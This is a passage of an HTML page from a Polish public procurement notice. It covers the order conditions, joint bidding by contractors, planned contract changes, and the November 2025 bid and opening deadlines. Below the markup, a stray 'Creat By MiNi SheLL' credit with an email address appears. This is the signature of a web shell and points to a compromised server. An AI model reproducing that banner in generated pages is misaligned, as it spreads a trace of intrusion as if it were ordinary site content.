mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, <br/> Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu <br/> o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy <br/> w sprawie zamówienia publicznego. <br/>Pełnomocnictwo, o którym mowa w pkt 1 należy dołączyć do oferty. <br/>Wszelką korespondencję w postępowaniu Zamawiający kieruje do pełnomocnika. <br/>Wspólnicy spółki cywilnej są Wykonawcami wspólnie ubiegającymi się o udzielenie <br/> zamówienia i mają do nich zastosowanie zasady określone w pkt 1 – 3.<br/>Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie <br/> zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia <br/> publicznego kopii umowy regulującej współpracę tych Wykonawców, zawierającej <br/> co najmniej: <br/>1. zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego <br/> swoim zakresem realizację przedmiotu zamówienia, <br/>2. określenie zakresu działania poszczególnych stron umowy, <br/>3. czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację <br/> zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dopuszczalne zmiany postanowień umowy określa § 9 oraz 12 wzoru umowy stanowiącego Załącznik Nr 8 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-13 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-13 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-12-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com